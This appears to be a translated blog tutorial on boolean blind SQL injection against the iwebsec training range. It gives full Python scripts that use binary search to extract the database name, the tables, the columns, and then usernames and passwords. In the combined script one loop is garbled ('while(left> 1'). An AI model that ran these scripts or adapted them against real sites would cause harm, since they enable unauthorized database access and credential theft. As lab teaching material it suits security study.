Directory
iwebsec range online site
bool injection
Install the requests library
Judgment injection point
* Get the length of the database (not necessary)
* Get the database name (not necessary)
Get the column names of the current database
Get the value in the database
All script code
iwebsec Range Online Site
iwebsec shooting range vulnerability database
bool injection
Bool injection is a type of blind injection. It is different from error injection. Boolean injection does not have any error message output, and the page returns only two states: normal and abnormal. Attackers can only judge whether the input SQL injection statement is correct through these two states returned, so that Determine what information is stored in the database.
In order to be able to see the information stored in the database, the method I choose is to write a script in python to output it
We need to install the requests library
Install the requests library
pip install requests
Or directly in the settings of pycharm
Go here The preparations we need are done
Judge the injection point
This is the normal state of the page
When we set id=100, we found that a row of data disappeared
?id=100
According to this disappearing welcome to iwebsec!!! We can start injection by this
*Get the database length (not necessary)
code show as below
import requests #Call the requests library, requests are used to send http requests and receive http responses python third-party library url="http://www.iwebsec.com:81/sqli/03.php" def SQLlenth(): for i in range(1,20): #judging the value in the character length can be changed payload="?id=1 and (length(database())={})-- + ".format(i) req_url=url + payload #Combine URL and payload bool =requests.get(req_url) #requests.get returns a Response object, which contains information about the server response, such as status code, response header and response content. This information can be obtained by accessing the corresponding properties. For example, you can use .status_code to get the status code of the response and .text to get the content of the response. if "welcome to iwebsec!!!" in bool.text: print("SQL length is " + str(i))
It is not difficult to see that the length of the database is 7
*Get the database name (optional)
In order to obtain the database name, because it is a blind injection, it can only be tried one by one.
The method used here is dichotomy (the following code is similar to this and will not be remarked), the code is as follows
def SQLname(): name="" for i in range(1,8): left=32 right=128 #The value of left and right is usually 32 128 ascii These ranges belong to visible characters middle=(left + right)>>1 # >>1 refers to converting the value of left + rigth into a binary number and then shifting one bit to the right while(left<right): payload = "?id=1 and ord(mid((select database()),{},1))>{} -- + ".format(i, middle)# put the value of the current position in the middle dichotomy req_url = url + payload print(req_url) #Display the process of dichotomy bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 #At this time, middle is smaller than the ASCII code of the character, assign the value of middle + 1 to left and enter the loop again else: right = middle #At this time, middle is greater than the ASCII code of the character, assign the value of middle to right and enter the loop again middle = (left + right) >> 1 name=name + chr(middle) #Every time the result is obtained, the character is converted from ASCII code to character and put into name print("sql name is {}". format(name))
Here we know the name of the database, next we come to get the table name
Get the table name of the current database
code show as below:
def TABLEname(): name = "" for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 name = name + chr(middle) print("tablename is {}".format(name))
Here the table names are obtained sqli,user,users,xss
Get the column name of the current database
code show as below:
def COLUMNname(): name = "" for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} -- + ".format( i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 name = name + chr(middle) print("tablename is {}".format(name))
The obtained column names are username, password, r (this is because the range I set is not large enough, so it is a little less, and you can change it yourself)
Get the value in the database
code show as below:
def usernameandpassword(): username = "" password = "" for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(username) from user),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 username = username + chr(middle) for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(password) from user),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 password = password + chr(middle) print("username is {}". format(username)) print("password is {}". format(password))
Here we have successfully obtained the data in username and password
All script code
# bool blind injection import requests #Call the requests library, requests are used to send http requests and receive http responses python third-party library url="http://www.iwebsec.com:81/sqli/03.php" def SQLlenth(): for i in range(1,20): #judging the value in the character length can be changed payload="?id=1 and (length(database())={})-- + ".format(i) req_url=url + payload #Combine URL and payload bool =requests.get(req_url) #requests.get returns a Response object, which contains information about the server response, such as status code, response header and response content. This information can be obtained by accessing the corresponding properties. For example, you can use .status_code to get the status code of the response and .text to get the content of the response. if "welcome to iwebsec!!!" in bool.text: print("SQL length is " + str(i)) def SQLname(): name="" for i in range(1,8): left=32 right=128 #The value of left and right is usually 32 128 ascii These ranges belong to visible characters middle=(left + right)>>1 # >>1 refers to converting the value of left + rigth into a binary number and then shifting one bit to the right while(left> 1 name=name + chr(middle) #Every time the result is obtained, the character is converted from ASCII code to character and put into name print("sql name is {}". format(name)) def TABLEname(): name = "" for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 name = name + chr(middle) print("tablename is {}".format(name)) # def COLUMNname(): name = "" for i in range(1, 20): left = 32 right = 128 middle = (left + right) >> 1 while (left < right): payload = "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} -- + ".format( i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 name = name + chr(middle) print("tablename is {}".format(name)) def usernameandpassword(): username = "" password = "" for i in range(1, 20): left = 32 right = 128 # The value of left and right is usually 32 128 ascii These ranges belong to visible characters middle = (left + right) >> 1 # >>1 refers to converting the value of left + rigth into a binary number and then shifting one bit to the right while (left < right): payload = "?id=1 and ord(mid((select group_concat(username) from user),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 username = username + chr(middle) for i in range(1, 20): left = 32 right = 128 # The value of left and right is usually 32 128 ascii These ranges belong to visible characters middle = (left + right) >> 1 # >>1 refers to converting the value of left + rigth into a binary number and then shifting one bit to the right while (left < right): payload = "?id=1 and ord(mid((select group_concat(password) from user),{},1))>{} -- + ".format(i, middle) req_url = url + payload bool = requests. get(req_url) if "welcome to iwebsec!!!" in bool.text: left = middle + 1 else: right = middle middle = (left + right) >> 1 password = password + chr(middle) print("username is {}". format(username)) print("password is {}". format(password)) SQLlenth() SQLname() TABLEname() COLUMNname() usernameandpassword()
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge MySQL entry skill tree SQL advanced skillsCTE and recursive query 44848 people are studying systematically